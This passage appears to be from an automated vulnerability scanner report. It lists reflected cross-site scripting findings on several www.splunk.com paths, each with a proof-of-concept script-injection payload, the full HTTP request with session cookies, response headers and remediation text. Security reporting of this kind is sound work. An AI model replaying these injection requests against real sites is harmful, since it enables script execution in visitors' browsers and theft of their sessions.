GET /product35d1b--><script>alert(1)</script>538a51777cb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.473. http://www.splunk.com/product [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/product
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35e00--><script>alert(1)</script>f5599213e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product?35e00--><script>alert(1)</script>f5599213e69=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload dd2d6--><script>alert(1)</script>2a06c6fb131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /searchdd2d6--><script>alert(1)</script>2a06c6fb131/docs HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload b1f41--><script>alert(1)</script>ce21d9d0fac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/docsb1f41--><script>alert(1)</script>ce21d9d0fac HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fad1"><script>alert(1)</script>d4904b444f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/docs3fad1"><script>alert(1)</script>d4904b444f2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.477. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/search/docs
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d7f95--><script>alert(1)</script>603aa4eab3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/docs?d7f95--><script>alert(1)</script>603aa4eab3b=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.478. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/search/docs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2d1"><script>alert(1)</script>d8e75fd0476 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/docs?ca2d1"><script>alert(1)</script>d8e75fd0476=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4129f--><script>alert(1)</script>3de290fb327 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services4129f--><script>alert(1)</script>3de290fb327 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:59 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.480. http://www.splunk.com/services [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/services
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b461c--><script>alert(1)</script>18e83a6bdce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services?b461c--><script>alert(1)</script>18e83a6bdce=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:37 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fe6cc--><script>alert(1)</script>c05cba58d3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /solutionsfe6cc--><script>alert(1)</script>c05cba58d3a HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.482. http://www.splunk.com/solutions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/solutions
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a5da2--><script>alert(1)</script>57c09440f05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /solutions?a5da2--><script>alert(1)</script>57c09440f05=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7a3f9--><script>alert(1)</script>3b8b3300f42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support7a3f9--><script>alert(1)</script>3b8b3300f42 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.484. http://www.splunk.com/support [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/support
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26060--><script>alert(1)</script>1685cc03ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /support?26060--><script>alert(1)</script>1685cc03ca5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2498f--><script>alert(1)</script>de17f1d4431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
